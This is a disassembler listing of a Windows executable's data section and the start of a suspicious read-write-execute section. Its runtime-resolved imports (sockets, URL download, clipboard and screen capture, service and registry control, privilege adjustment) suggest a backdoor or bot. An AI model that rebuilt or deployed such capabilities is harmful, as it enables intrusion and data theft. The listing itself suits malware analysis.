dd offset aFri ; "Fri"
dd offset aSat ; "Sat"
dd offset aSunday ; "Sunday"
dd offset aMonday ; "Monday"
dd offset aTuesday ; "Tuesday"
dd offset aWednesday ; "Wednesday"
dd offset aThursday ; "Thursday"
dd offset aFriday ; "Friday"
dd offset aSaturday ; "Saturday"
dd offset aJan ; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
dd offset aJun ; "Jun"
dd offset aJul ; "Jul"
dd offset aAug ; "Aug"
dd offset aSep ; "Sep"
dd offset aOct ; "Oct"
dd offset aNov ; "Nov"
dd offset aDec ; "Dec"
dd offset aJanuary ; "January"
dd offset aFebruary ; "February"
dd offset aMarch ; "March"
dd offset aApril ; "April"
dd offset aMay ; "May"
dd offset aJune ; "June"
dd offset aJuly ; "July"
dd offset aAugust ; "August"
dd offset aSeptember ; "September"
dd offset aOctober ; "October"
dd offset aNovember ; "November"
dd offset aDecember ; "December"
dd offset aAm ; "AM"
dd offset aPm ; "PM"
dd offset aMmDdYy ; "MM/dd/yy"
dd offset aDdddMmmmDdYyyy ; "dddd, MMMM dd, yyyy"
dd offset aHhMmSs ; "HH:mm:ss"
dd 409h, 1, 0
dword_42D160 dd 2Eh off_42D164 dd offset dword_42D160 ; DATA XREF: sub_41B24B+15�r
; .data:0042C7A0�o ...
off_42D168 dd offset dword_47A140 ; DATA XREF: sub_41B24B+32�r
off_42D16C dd offset dword_47A140 ; DATA XREF: sub_41B24B+4E�r
off_42D170 dd offset dword_47A140 ; DATA XREF: sub_41B2AA+1B�r
off_42D174 dd offset dword_47A140 ; DATA XREF: sub_41B2AA+38�r
off_42D178 dd offset dword_47A140 ; DATA XREF: sub_41B2AA+55�r
off_42D17C dd offset dword_47A140 ; DATA XREF: sub_41B2AA+72�r
off_42D180 dd offset dword_47A140 ; DATA XREF: sub_41B2AA+8F�r
off_42D184 dd offset dword_47A140 ; DATA XREF: sub_41B2AA+AC�r
off_42D188 dd offset dword_47A140 ; DATA XREF: sub_41B2AA+C8�r
dd 2 dup(7F7F7F7Fh)
off_42D194 dd offset off_42D164 ; DATA XREF: sub_41B24B+B�r
; sub_41B24B+27�r ...
align 10h
dd 1, 3 dup(0)
dword_42D1B0 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFhdword_42D1C8 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fhdword_42D1E0 dd 2694h ; sub_41D4B3+60�r
align 8
dword_42D1E8 dd 14h off_42D1EC dd offset aExp ; DATA XREF: sub_41D3C2:loc_41D43A�r
; "exp"
dd 1Dh, 428058h, 1Ah, 426084h, 1Bh, 42805Ch, 1Fh, 4287F0h
dd 13h, 4287E8h, 21h, 4287E0h, 0Eh, 4287D8h, 0Dh, 4287D0h
dd 0Fh, 428020h, 10h, 4287C8h, 5, 4287C0h, 1Eh, 4287BCh
dd 12h, 4287B8h, 20h, 4287B4h, 0Ch, 428028h, 0Bh, 428030h
dd 15h, 4287ACh, 1Ch, 428038h, 19h, 4287A4h, 11h, 42879Ch
dd 18h, 428794h, 16h, 42878Ch, 17h, 428784h, 22h, 428780h
dd 23h, 42877Ch, 24h, 428778h, 25h, 428770h, 26h, 428764h
dbl_42D2D0 dq 1.797693134862316e308 ; DATA XREF: sub_41D14B+BC�r
; sub_41D14B:loc_41D239�r ...
dd 0
dd 0FFF80000h
dbl_42D2E0 dq 1.797693134862316e308 ; DATA XREF: sub_41D14B+93�r
; sub_41D14B:loc_41D20F�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_42D2F8 dt 2.3562723457267347066e313 ; DATA XREF: sub_41D702+B�r
; sub_41D702+1E�r
align 4
tbyte_42D304 dt 1.9149954921904370718e-1233 ; DATA XREF: sub_41D702+31�r
align 10h
dd 7080h, 1, 0FFFFF1F0h, 0
dword_42D320 dd 545350h, 0Fh dup(0)dword_42D360 dd 544450h, 0Fh dup(0) dd offset dword_42D320
dd offset dword_42D360
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd 0FFFFFFFFh, 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h
dd 111h, 130h, 14Eh, 16Dh, 0FFFFFFFFh, 1Eh, 3Ah, 59h, 77h
dd 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh, 14Dh, 16Ch, 2 dup(0)
dword_42D430 dd 2 dup(0) dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
; ---------------------------------------------------------------------------
push eax
retn
; ---------------------------------------------------------------------------
dw 400Fh
dd 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_42D590 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: sub_41E7DB+26�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 5 dup(0)
dword_42D700 dd 0 ; sub_401525+CF�w ...
dword_42D704 dd 0 ; sub_4018D1+EE�w ...
dd 3E6h dup(0)
dword_42E6A0 dd 6 dup(0) ; sub_40169B+129�o ...
dword_42E6B8 dd 0 ; sub_401141+35E�o
dword_42E6BC dd 0A2h dup(0) dword_42E944 dd 41h dup(0) dword_42EA48 dd 0 ; sub_401141+30C�r
align 10h
dword_42EA50 dd 0 ; sub_401141+370�r
dword_42EA54 dd 0 dword_42EA58 dd 0 dword_42EA5C dd 0 dd 0
dword_42EA64 dd 0 dword_42EA68 dd 0 ; sub_401141+215�r ...
dword_42EA6C dd 41h dup(0) dword_42EB70 dd 41h dup(0) dword_42EC74 dd 0 ; sub_401141+261�r
dword_42EC78 dd 0 dword_42EC7C dd 0 ; sub_401141+20F�r
dword_42EC80 dd 20h dup(0) ; sub_401141+1FA�o
dword_42ED00 dd 0 dword_42ED04 dd 0 ; sub_401141+204�w
dword_42ED08 dd 0 align 10h
dword_42ED10 dd 0 ; sub_401141+102�o
dword_42ED14 dd 41h dup(0) dword_42EE18 dd 41h dup(0) dword_42EF1C dd 0 ; sub_401141+114�r
dword_42EF20 dd 0 dword_42EF24 dd 0 ; sub_401141+CF�r
dword_42EF28 dd 20h dup(0) ; sub_401141+BA�o
dword_42EFA8 dd 0 dword_42EFAC dd 0 ; sub_401141+C4�w
dword_42EFB0 dd 0 align 8
dword_42EFB8 dd 1000h dup(0) ; sub_401CD3�o ...
dword_432FB8 dd 0Dh dup(0) ; sub_401CD3+E�o ...
dword_432FEC dd 0 dword_432FF0 dd 0 ; sub_402A0E+51�r ...
dword_432FF4 dd 0 ; sub_402B1D+6A�w ...
byte_432FF8 db 0 ; DATA XREF: sub_404249+11E�w
; sub_404249+220�o
align 2
word_432FFA dw 0 ; DATA XREF: sub_404249+12B�w
word_432FFC dw 0 ; DATA XREF: sub_404249+136�w
word_432FFE dw 0 ; DATA XREF: sub_404249+13F�w
byte_433000 db 0 ; DATA XREF: sub_404249+145�w
byte_433001 db 0 ; DATA XREF: sub_404249+14C�w
word_433002 dw 0 ; DATA XREF: sub_404249+153�w
dword_433004 dd 0 ; sub_404249+19B�w
dword_433008 dd 0 byte_43300C db 0 ; DATA XREF: sub_404249+1B2�w
byte_43300D db 0 ; DATA XREF: sub_404249+1C2�w
word_43300E dw 0 ; DATA XREF: sub_404249+1D5�w
word_433010 dw 0 ; DATA XREF: sub_404249+1E7�w
word_433012 dw 0 ; DATA XREF: sub_404249+1DD�w
dword_433014 dd 100h dup(0) dword_433414 dd 0 ; resolved to->WSOCK32.recv ; sub_4028A8+F8�r ...
dword_433418 dd 0 ; resolved to->WS2_32.getsockname ; sub_40468E+72C�r ...
dword_43341C dd 0 ; sub_40468E+9AE�r
dword_433420 dd 0 ; resolved to->WININET.InternetCrackUrlA ; sub_40468E+834�r
dword_433424 dd 0 ; resolved to->WS2_32.WSASocketA ; sub_40468E+64C�r
dword_433428 dd 0 ; resolved to->WININET.InternetGetConnectedState ; sub_40468E+7F5�r ...
dword_43342C dd 0 ; resolved to->KERNEL32.GetDriveTypeA ; sub_40468E+8C�w ...
dword_433430 dd 0 ; resolved to->USER32.CloseClipboard ; sub_40468E+1E2�r ...
dword_433434 dd 0 ; resolved to->USER32.IsWindow ; sub_40468E+1C2�r
dword_433438 dd 0 ; resolved to->WSOCK32.recvfrom ; sub_40468E+6FC�r ...
dword_43343C dd 0 ; resolved to->GDI32.SelectObject ; sub_40468E+463�r
dword_433440 dd 0 dword_433444 dd 0 ; resolved to->WS2_32.ioctlsocket ; sub_403E06+B1�r ...
dword_433448 dd 0 ; resolved to->WININET.InternetOpenA ; sub_40468E+7FB�r
dword_43344C dd 0 ; resolved to->USER32.OpenClipboard ; sub_40468E+1D2�r ...
dword_433450 dd 0 ; resolved to->KERNEL32.Process32Next ; sub_40468E+CA�r ...
dword_433454 dd 0 ; sub_40468E+99E�r
dword_433458 dd 0 ; resolved to->WS2_32.connect ; sub_4028A8+8D�r ...
dword_43345C dd 0 ; sub_40468E+BA6�r ...
dword_433460 dd 0 ; resolved to->ADVAPI32.RegQueryValueExA ; sub_40468E+27C�r
dword_433464 dd 0 ; resolved to->WS2_32.accept ; sub_40468E+5E6�w ...
dword_433468 dd 0 ; .text:00412A31�r
dword_43346C dd 0 ; sub_40468E+9B6�r ...
dword_433470 dd 0 ; resolved to->WS2_32.sendto ; sub_40468E+598�w ...
dword_433474 dd 0 ; resolved to->SHELL32.SHChangeNotifydword_433478 dd 0 ; resolved to->KERNEL32.SetErrorMode ; sub_40468E+AD�r ...
dword_43347C dd 0 ; sub_40468E+AD6�r
dword_433480 dd 0 ; sub_40468E+9C6�r ...
dword_433484 dd 0 ; resolved to->ADVAPI32.RegSetValueExA ; sub_40468E+23E�w ...
dword_433488 dd 0 ; sub_40468E+981�r ...
dword_43348C dd 0 ; sub_40468E+9CE�r ...
dword_433490 dd 0 ; resolved to->KERNEL32.CreateToolhelp32Snapshot ; sub_40468E+BA�r ...
dword_433494 dd 0 ; resolved to->ADVAPI32.DeleteService ; sub_40468E+367�r ...
dword_433498 dd 0 ; resolved to->USER32.DestroyWindow ; sub_40468E+1CA�r
dword_43349C dd 0 ; resolved to->KERNEL32.GetDiskFreeSpaceExA ; sub_40468E+72�w ...
dword_4334A0 dd 0 ; resolved to->WS2_32.socket ; sub_4028A8+45�r ...
dword_4334A4 dd 0 ; sub_40468E+98E�r ...
dword_4334A8 dd 0 ; resolved to->WININET.InternetOpenUrlA ; sub_40468E+7D4�w ...
dword_4334AC dd 0 ; resolved to->IPHLPAPI.GetIpNetTable ; sub_40468E+A5D�r ...
dword_4334B0 dd 0 ; resolved to->WS2_32.WSAStartup ; sub_40468E+4BB�w ...
dword_4334B4 dd 0 ; sub_4065CE+72�r
dword_4334B8 dd 0 ; resolved to->KERNEL32.Module32First ; sub_4070E8+15C�r ...
dword_4334BC dd 0 ; resolved to->WSOCK32.setsockopt ; sub_40468E+5F3�w ...
dword_4334C0 dd 0 ; resolved to->KERNEL32.SearchPathA ; sub_40468E+EA�r ...
dword_4334C4 dd 0 ; sub_40468E+BB6�r ...
dword_4334C8 dd 0 ; resolved to->WININET.HttpOpenRequestA ; sub_40468E+810�r
dword_4334CC dd 0 ; resolved to->GDI32.DeleteDC ; sub_40468E+473�r
dword_4334D0 dd 0 ; resolved to->ADVAPI32.CloseServiceHandle ; sub_40468E+36F�r ...
dword_4334D4 dd 0 ; resolved to->WININET.InternetConnectA ; sub_40468E+820�r
dword_4334D8 dd 0 ; sub_40468E+9A6�r ...
dword_4334DC dd 0 ; resolved to->ADVAPI32.RegDeleteValueA ; sub_40468E+258�w ...
dword_4334E0 dd 0 ; resolved to->WS2_32.getpeername ; sub_40E00D+E3�r
dword_4334E4 dd 0 ; resolved to->KERNEL32.QueryPerformanceCounter ; sub_40468E+F2�r
dword_4334E8 dd 0 ; resolved to->ADVAPI32.RegCreateKeyExA ; sub_40468E+231�w ...
dword_4334EC dd 0 ; resolved to->KERNEL32.Process32First ; sub_40468E+C2�r ...
dword_4334F0 dd 0 ; resolved to->IPHLPAPI.IcmpCreateFile ; sub_40468E+8B6�r ...
dword_4334F4 dd 0 ; resolved to->WS2_32.__WSAFDIsSet ; sub_40468E+4E2�w ...
dword_4334F8 dd 0 ; resolved to->USER32.FindWindowA ; sub_40468E+1BA�r ...
dword_4334FC dd 0 ; resolved to->WININET.InternetCloseHandle ; sub_40468E+801�w
dword_433500 dd 0 ; resolved to->WS2_32.gethostbyname ; sub_40468E+73C�r ...
dword_433504 dd 0 ; resolved to->DNSAPI.DnsFlushResolverCacheEntry_Adword_433508 dd 0 ; resolved to->ADVAPI32.AdjustTokenPrivileges ; sub_40707D+55�r
dword_43350C dd 0 ; resolved to->IPHLPAPI.DeleteIpNetEntry ; sub_406B55+98�r
dword_433510 dd 0 ; resolved to->GDI32.GetDeviceCaps ; sub_40468E+453�r
dword_433514 dd 0 ; resolved to->WS2_32.inet_addr ; sub_4028A8+25�r ...
dword_433518 dd 0 ; resolved to->GDI32.CreateCompatibleDC ; sub_40468E+44B�r
dword_43351C dd 0 ; resolved to->GDI32.DeleteObjectdword_433520 dd 0 ; resolved to->WS2_32.inet_ntoa ; sub_40169B+77�r ...
dword_433524 dd 0 ; resolved to->IPHLPAPI.IcmpCloseHandle ; sub_40468E+8C3�r ...
dword_433528 dd 0 ; resolved to->GDI32.BitBlt ; sub_40468E+46B�r
dword_43352C dd 0 ; resolved to->WS2_32.WSAAsyncSelect ; sub_40468E+658�r ...
dword_433530 dd 0 ; resolved to->ADVAPI32.GetUserNameA ; sub_40FE1F+ED�r
dword_433534 dd 0 ; resolved to->WS2_32.send ; sub_4028A8+E2�r ...
dword_433538 dd 0 ; resolved to->USER32.ExitWindowsEx ; sub_4058F3+15�r
dword_43353C dd 0 ; resolved to->KERNEL32.GetLogicalDriveStringsA ; sub_402717+2B�r ...
dword_433540 dd 0 ; sub_40468E+AC1�r
dword_433544 dd 0 ; resolved to->WS2_32.select ; sub_403E06+3C4�r ...
dword_433548 dd 0 ; resolved to->KERNEL32.QueryPerformanceFrequencydword_43354C dd 0 ; resolved to->WININET.InternetReadFile ; sub_40468E+7EE�w ...
dword_433550 dd 0 ; sub_40468E+BBE�r ...
dword_433554 dd 0 ; resolved to->GDI32.GetDIBColorTable ; sub_40468E+45B�r
dword_433558 dd 0 ; resolved to->WS2_32.WSAGetLastError ; sub_403E06:loc_4041D9�r ...
dword_43355C dd 0 ; resolved to->ADVAPI32.OpenSCManagerA ; sub_40468E+342�r ...
dword_433560 dd 0 ; resolved to->USER32.SendMessageA ; sub_40468E+1AD�r ...
dword_433564 dd 0 ; resolved to->ADVAPI32.StartServiceA ; sub_40468E+357�r ...
dword_433568 dd 0 ; sub_40468E+9BE�r ...
dword_43356C dd 0 ; resolved to->ADVAPI32.EnumServicesStatusA ; sub_40468E+377�r ...
dword_433570 dd 0 ; resolved to->WS2_32.ntohl ; sub_40468E+57E�w ...
dword_433574 dd 0 ; resolved to->WS2_32.WSAIoctl ; sub_40468E+664�r
dword_433578 dd 0 ; resolved to->WS2_32.bind ; sub_40468E+5BF�w ...
dword_43357C dd 0 ; resolved to->ADVAPI32.RegCloseKey ; sub_40468E+265�w ...
dword_433580 dd 0 ; resolved to->ADVAPI32.ControlService ; sub_40468E+35F�r ...
dword_433584 dd 0 ; resolved to->DNSAPI.DnsFlushResolverCache ; sub_40468E+A13�r ...
dword_433588 dd 0 ; resolved to->IPHLPAPI.IcmpSendEcho ; sub_406CD9+116�r
dword_43358C dd 0 ; sub_40468E+B99�r ...
dword_433590 dd 0 ; resolved to->WS2_32.gethostbyaddr ; sub_40468E+744�r ...
dword_433594 dd 0 ; resolved to->WS2_32.ntohs ; sub_40468E+6DC�r
dword_433598 dd 0 ; resolved to->ADVAPI32.IsValidSecurityDescriptor ; sub_4067C0+AB�r
dword_43359C dd 0 dword_4335A0 dd 0 ; sub_40468E+996�r ...
dword_4335A4 dd 0 ; sub_40468E+BAE�r ...
dword_4335A8 dd 0 ; resolved to->SHELL32.ShellExecuteA ; sub_40468E+B1B�r ...
dword_4335AC dd 0 ; resolved to->WS2_32.closesocket ; sub_402795+12�r ...
dword_4335B0 dd 0 ; resolved to->GDI32.CreateDIBSection ; sub_40468E+443�r
dword_4335B4 dd 0 ; resolved to->WS2_32.gethostname ; sub_40468E+734�r
dword_4335B8 dd 0 ; resolved to->WS2_32.WSACleanup ; sub_402795+1D�r ...
dword_4335BC dd 0 ; resolved to->ADVAPI32.LookupPrivilegeValueA ; sub_40468E+2C9�r ...
dword_4335C0 dd 0 ; resolved to->WS2_32.listen ; sub_40468E+5D9�w ...
dword_4335C4 dd 0 ; resolved to->WS2_32.ntohl ; sub_40468E+564�w ...
dword_4335C8 dd 0 ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_40468E+25F�r ...
dword_4335CC dd 0 ; resolved to->USER32.GetClipboardData ; sub_40468E+1DA�r ...
dword_4335D0 dd 0 ; sub_40468E+ACE�r
dword_4335D4 dd 0 ; resolved to->ADVAPI32.OpenProcessToken ; sub_40468E+2BC�r ...
dword_4335D8 dd 0 ; resolved to->ADVAPI32.OpenServiceA ; sub_40468E+34F�r ...
dword_4335DC dd 0 ; resolved to->GDI32.CreateDCA ; sub_40468E+436�r
dword_4335E0 dd 0 ; sub_40468E+863�w ...
dword_4335E4 dd 0 ; resolved to->WININET.HttpSendRequestA ; sub_40468E+818�r
dword_4335E8 dd 0 ; resolved to->WININET.InternetGetConnectedStateExA ; sub_40468E+808�r ...
dword_4335EC dd 0 ; resolved to->WS2_32.ntohs ; sub_4028A8+70�r ...
dword_4335F0 dd 0 ; sub_40468E+12B�w ...
dword_4335F4 dd 0 ; sub_405277+1C�r
dword_4335F8 dd 0 ; sub_405277:loc_4052BF�r
dword_4335FC dd 0 ; sub_405277+50�r
dword_433600 dd 0 ; sub_40468E:loc_404963�w ...
dword_433604 dd 0 ; sub_405277+84�r
dword_433608 dd 0 ; sub_405277:loc_405327�r
dword_43360C dd 0 ; sub_405277+B8�r
dword_433610 dd 0 ; sub_405277:loc_40535B�r
dword_433614 dd 0 ; sub_405277+EC�r
dword_433618 dd 0 ; sub_40468E+877�w ...
dword_43361C dd 0 ; sub_405277+120�r
dword_433620 dd 0 ; sub_405277:loc_4053C3�r ...
dword_433624 dd 0 ; sub_405277+154�r
dword_433628 dd 0 ; sub_405277:loc_4053F7�r ...
dword_43362C dd 0 ; sub_405277+188�r
dword_433630 dd 0 ; sub_405277:loc_40542B�r
dword_433634 dd 0 ; sub_405277+1BC�r
dword_433638 dd 0 ; sub_405277:loc_40545F�r
dword_43363C dd 0 ; sub_405277+1F0�r
dword_433640 dd 0 ; sub_405277:loc_405493�r
dword_433644 dd 0 ; sub_405277+224�r
dword_433648 dd 0 ; sub_405277:loc_4054C7�r
dword_43364C dd 0 ; sub_405277+258�r
dword_433650 dd 0 ; sub_405277:loc_4054FB�r
dword_433654 dd 0 ; sub_405277+28C�r
align 10h
dword_433660 dd 80h dup(0) dword_433860 dd 17h dup(0) ; sub_405C4B+12D�o ...
dword_4338BC dd 0 ; sub_405F46+5B�r ...
dword_4338C0 dd 0 ; sub_405F46+3E�w ...
align 8
dword_4338C8 dd 18h dup(0) ; sub_40649E+12A�o
dword_433928 dd 80h dup(0) ; sub_4065CE+A9�o
dword_433B28 dd 80h dup(0) ; sub_40668A+60�o
dword_433D28 dd 80h dup(0) ; sub_406702+83�o ...
dword_433F28 dd 80h dup(0) ; sub_4068DF+8E�o ...
dword_434128 dd 4 dup(0) dword_434138 dd 0 ; sub_401F06+14E�o ...
dd 7Fh dup(0)
dword_434338 dd 0 ; sub_410FD3+3E�w ...
dword_43433C dd 0 ; sub_40169B:loc_4018AD�r ...
dword_434340 dd 0 ; sub_40F07B+A2�w ...
dword_434344 dd 0 ; sub_403E06+78�w ...
dword_434348 dd 0 ; sub_40D744:loc_40D7C1�r ...
dword_43434C dd 0 ; sub_401141+26F�w ...
byte_434350 db 0 ; DATA XREF: sub_40779B+57�o
; sub_4078FA+22F1�r ...
align 4
dd 44FFh dup(0)
dword_445750 dd 0CDDEh dup(0)dword_478EC8 dd 0 ; sub_410EEA+13�o ...
dword_478ECC dd 20h dup(0) ; sub_40D1EF+4B8�o ...
dword_478F4C dd 10h dup(0) dword_478F8C dd 24h dup(0) dword_47901C dd 0 ; sub_40D1EF+4CF�w ...
dword_479020 dd 0 align 10h
dword_479030 dd 0 ; sub_401B23+62�r ...
dd 5 dup(0)
dword_479048 dd 0 ; sub_4078FA+9DC�r
dd 1Fh dup(0)
dword_4790C8 dd 0 ; sub_4110F9+19�o
dword_4790CC dd 2B9h dup(0) dword_479BB0 dd 0 ; sub_401B23+47�o ...
byte_479BB4 db 0 ; DATA XREF: sub_40751F+2A�r
; sub_40751F+33�o
align 4
dword_479BB8 dd 0 ; sub_40D1EF+46C�w ...
dword_479BBC dd 0 ; sub_40D1EF+404�w
dword_479BC0 dd 0 ; sub_40DDC6+87�o
dword_479BC4 dd 0 ; sub_40DC39+119�r ...
dword_479BC8 dd 0 ; sub_40DDC6+115�w
dword_479BCC dd 0 ; sub_40DC39+32�r ...
dword_479BD0 dd 0Dh dup(0) ; sub_40DC39+114�o ...
dword_479C04 dd 0 ; sub_40DC39+53�r ...
dd 0
dword_479C0C dd 0 dd 2 dup(0)
dword_479C18 dd 80h dup(0) byte_479E18 db 0 ; DATA XREF: sub_40F689:loc_40F6E6�r
; sub_40F689+93�w
align 4
dword_479E1C dd 0Eh dup(0) dword_479E54 dd 0 dword_479E58 dd 0 dword_479E5C dd 0 ; sub_416764�r ...
dword_479E60 dd 0 ; .text:00414984�w
dword_479E64 dd 0 dword_479E68 dd 0 ; sub_416764+9�r ...
dword_479E6C dd 0 dword_479E70 dd 0 ; sub_41A3FA+8F�w
dword_479E74 dd 0 ; sub_40D1EF+314�r ...
dd 0
dword_479E7C dd 0 ; sub_41A1C7:loc_41A278�r ...
dd 3 dup(0)
dword_479E8C dd 0 dd 0
byte_479E94 db 0 ; DATA XREF: sub_414460+35�w
; sub_41665F+5�r
align 4
dword_479E98 dd 0 dword_479E9C dd 0 ; sub_414460+C1�w
dword_479EA0 dd 0 ; sub_41A1C7:loc_41A1D9�r ...
align 8
dword_479EA8 dd 0 dd 3 dup(0)
dword_479EB8 dd 0 ; sub_418FBC:loc_418FE5�w ...
align 10h
dword_479EC0 dd 54h dup(0) dword_47A010 dd 0 dword_47A014 dd 0 ; sub_41318A+192�r ...
dword_47A018 dd 0 ; sub_4182E4+31�w ...
dd 2 dup(0)
dword_47A024 dd 0 ; sub_41945D+1D�w ...
dword_47A028 dd 0 align 10h
dword_47A030 dd 41h dup(0) byte_47A134 db 0 ; DATA XREF: sub_41A3FA:loc_41A411�w
align 4
dword_47A138 dd 0 ; sub_41A49C+24�w ...
dword_47A13C dd 0 ; sub_41AF01+2E�w ...
dword_47A140 dd 0 ; .data:off_42D16C�o ...
dword_47A144 dd 0 dword_47A148 dd 0 dd 0Bh dup(0)
dword_47A178 dd 0 ; sub_41AF01+14A�r
dd 3 dup(0)
dword_47A188 dd 0 ; sub_4182E4+272�r ...
dd 0Ah dup(0)
dword_47A1B4 dd 0 ; resolved to->KERNEL32.InitializeCriticalSectionAndSpinCount ; sub_41BBD8+39�w ...
dword_47A1B8 dd 0 dword_47A1BC dd 0 dword_47A1C0 dd 0 ; sub_41CD5F+38�r ...
dword_47A1C4 dd 0 ; resolved to->USER32.MessageBoxA ; sub_41D75B+38�w ...
dword_47A1C8 dd 0 ; resolved to->USER32.GetActiveWindow ; sub_41D75B:loc_41D820�r
dword_47A1CC dd 0 ; resolved to->USER32.GetLastActivePopup ; sub_41D75B+D6�r
dword_47A1D0 dd 0 ; resolved to->USER32.GetProcessWindowStation ; sub_41D75B:loc_41D7DB�r
dword_47A1D4 dd 0 ; resolved to->USER32.GetUserObjectInformationA ; sub_41D75B+9C�r
dd 30h dup(0)
dword_47A298 dd 0 dword_47A29C dd 0 ; sub_41E363+87�r
dword_47A2A0 dd 0 ; sub_41E363+4D�r
dword_47A2A4 dd 0 ; sub_41E363+40�r
dword_47A2A8 dd 0 ; sub_41E363+5A�r
dd 4 dup(0)
dword_47A2BC dd 0 dword_47A2C0 dd 0 dword_47A2C4 dd 0 dword_47A2C8 dd 0 ; sub_417703+F�r ...
dd 5 dup(0)
dword_47A2E0 dd 0 ; sub_416304+5B�r ...
dword_47A2E4 dd 3Fh dup(0) dword_47A3E0 dd 0 ; sub_419AA1+2D�w ...
dword_47A3E4 dd 0 ; sub_419AA1+46�w
dword_47A3E8 dd 0 ; sub_4190C6+87�r ...
dword_47A3EC dd 0 ; sub_419258:loc_419297�r ...
dword_47A3F0 dd 0 ; sub_4192C7+F5�w ...
align 10h
byte_47A400 db 0 ; DATA XREF: sub_41909D+6�o
; sub_4192C7+55�o ...
byte_47A401 db 0 ; DATA XREF: sub_4141AD+5E�r
; sub_4190C6+107�w ...
align 4
dd 40h dup(0)
dword_47A504 dd 0 ; sub_4190C6+19�r ...
align 10h
word_47A510 dw 0 ; DATA XREF: sub_41909D+1F�o
; sub_4192C7+10C�o ...
align 10h
byte_47A520 db 0 ; DATA XREF: sub_4190C6:loc_4191DB�w
; sub_4190C6:loc_4191F8�w ...
align 4
dd 3Fh dup(0)
dword_47A620 dd 0 ; sub_4169A5+21C�r ...
dword_47A624 dd 0 ; sub_41697A�r ...
dword_47A628 dd 0 ; sub_41697A+8�r ...
dword_47A62C dd 0 ; sub_4133A6+18�r ...
dword_47A630 dd 0 ; sub_4169A5+300�w ...
dword_47A634 dd 0 ; sub_416CBD+5�r ...
dword_47A638 dd 0 ; sub_4169A5+249�r ...
dword_47A63C dd 0 ; sub_41318A+DA�r ...
dword_47A640 dd 0 ; sub_41318A:loc_4131C0�r ...
dword_47A644 dd 0 ; sub_4164D8+51�r ...
dd 6 dup(0)
dword_47A660 dd 400h dup(0) ; .data:0042C908�o
dword_47B660 dd 0 ; sub_4165B6�r ...
dword_47B664 dd 0 ; sub_41A15E+F�r ...
dword_47B668 dd 0 dword_47B66C dd 0 ; sub_414460:loc_4144BA�r ...
dword_47B670 dd 0 ; sub_414460+62�r ...
dword_47B674 dd 0 ; sub_4195AD+11�w ...
_data ends
; Section 4. (virtual address 0007C000)
; Virtual size : 0001A000 ( 106496.)
; Section size in file : 0001A000 ( 106496.)
; Offset to raw data for section: 0007C000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
fuck segment para public 'CODE' use32
assume cs:fuck
;org 47C000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dd 3 dup(0)
dd 7C028h, 7C035h, 5 dup(0)
dd 4E52454Bh, 32334C45h, 4C4C442Eh, 801D7700h
db 7Ch
